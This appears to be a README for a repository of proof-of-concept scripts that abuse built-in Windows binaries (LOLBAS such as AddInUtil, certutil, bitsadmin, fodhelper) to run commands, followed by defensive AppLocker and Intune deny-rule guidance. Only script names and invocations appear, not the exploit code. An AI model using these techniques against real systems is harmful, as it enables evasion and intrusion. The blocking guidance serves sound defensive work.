This repo showcases practical PoCs using LOLBAS techniques to execute commands without dropping malware. Whether you're a red teamer, researcher, or just here for the chaos, you’ll find "weaponized" LOL moments and harmless-looking binaries doing suspiciously powerful things or not.
💻 Built for demos.
🎩 Powered by misused trust.
🔍 Monitored by defenders (hopefully).
💣 Triggered by AddInUtil, msbuild, certutil, and friends.
.NET Tool used for updating cache files for Microsoft Office Add-Ins.
python3 AddinUtil.py- https://github.com/pwntester/ysoserial.net
- https://lolbas-project.github.io/lolbas/Binaries/Addinutil/
ASP.NET Compilation Tool
python3 Aspnet_Compiler.pyTool used for installation of AppX/MSIX applications on Windows 10
python3 AppInstaller.py- https://learn.microsoft.com/en-us/windows-hardware/get-started/adk-install
- https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/
Schedule periodic tasks
python3 Schtasks.pyAssistive Technology (AT)
Administrative Privileges Required
python3 Atbroker.pyUsed for managing background intelligent transfer
python3 Bitsadmin.pyUsed for installing certificates. Included in Windows Server
python3 CertOC.pyWindows binary used for handling certificates
Administrative Privileges Required
python3 Certutil.pyManage optional features in Windows
python3 Fodhelper.pyBinary used to launch controlpanel items in Windows
python3 Control.pyBinary file used by .NET Framework to compile C# code
python3 Csc.pyUtility for installing software and drivers with rundll32.exe
python Advpack.pySelects and executes a command on a file or set of files. This command is useful for batch processing.
python Forfiles.pyA binary designed for connecting to FTP servers.
python Ftp.py- Microsoft Intune admin center -> Devices -> Configuration -> New Policy
- Assignment: Devices only, NOT users.
- Platform: Windows 10 and later
- Policy Type: Custom
- Add OMA-URI Settings rule
OMA-URI
- The {Grouping} field can be assigned any string value, allowing users to create and define custom groups as needed.
./Vendor/MSFT/AppLocker/ApplicationLaunchRestrictions/{GROUPING}/EXE/PolicyBasic XML String Value sample
- The following XML rules represent a basic ruleset and should be carefully reviewed and enhanced to meet your organizational requirements before applying them to your Intune OMA-URI policy.
<RuleCollection Type="Exe" EnforcementMode="NotConfigured">
<FilePathRule Id="{GUID}" Name="(Default Rule) All files located in the Program Files folder" Description="Allows members of the Everyone group to run applications that are located in the Program Files folder." UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="%PROGRAMFILES%\*" />
</Conditions>
</FilePathRule>
<FilePathRule Id="{GUID}" Name="(Default Rule) All files located in the Windows folder" Description="Allows members of the Everyone group to run applications that are located in the Windows folder." UserOrGroupSid="S-1-1-0" Action="Allow">
<Conditions>
<FilePathCondition Path="%WINDIR%\*" />
</Conditions>
</FilePathRule>
<FilePathRule Id="{GUID}" Name="(Default Rule) All files" Description="Allows members of the local Administrators group to run all applications." UserOrGroupSid="S-1-5-32-544" Action="Allow">
<Conditions>
<FilePathCondition Path="*" />
</Conditions>
</FilePathRule>
<FilePublisherRule Id="{GUID}" Name="ADDINUTIL.EXE, in MICROSOFT® .NET FRAMEWORK, from O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" Description="" UserOrGroupSid="S-1-1-0" Action="Deny">
<Conditions>
<FilePublisherCondition PublisherName="O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US" ProductName="MICROSOFT® .NET FRAMEWORK" BinaryName="ADDINUTIL.EXE">
<BinaryVersionRange LowSection="*" HighSection="*" />
</FilePublisherCondition>
</Conditions>
</FilePublisherRule>
</RuleCollection>Create your AppLocker policy in a lab machine via secpol.msc or GPO, export to XML, and deploy it.
- Windows Key + R
- secpol.msc
- Application Control Policies -> AppLocker -> Executable Rules -> Create new Rule
- Permissions Action: Deny
- Conditions: Publisher
- Right click on AppLocker -> Export Policy
- https://lolbas-project.github.io/
- https://intune.microsoft.com/
- https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/applications-that-can-bypass-appcontrol
- https://learn.microsoft.com/en-us/windows/client-management/mdm/applocker-csp
- https://learn.microsoft.com/en-us/windows/client-management/mdm/applocker-csp#applicationlaunchrestrictionsgroupingexepolicy
- https://learn.microsoft.com/en-us/troubleshoot/mem/intune/device-configuration/deploy-oma-uris-to-target-csp-via-intune
- https://github.com/hfiref0x/UACME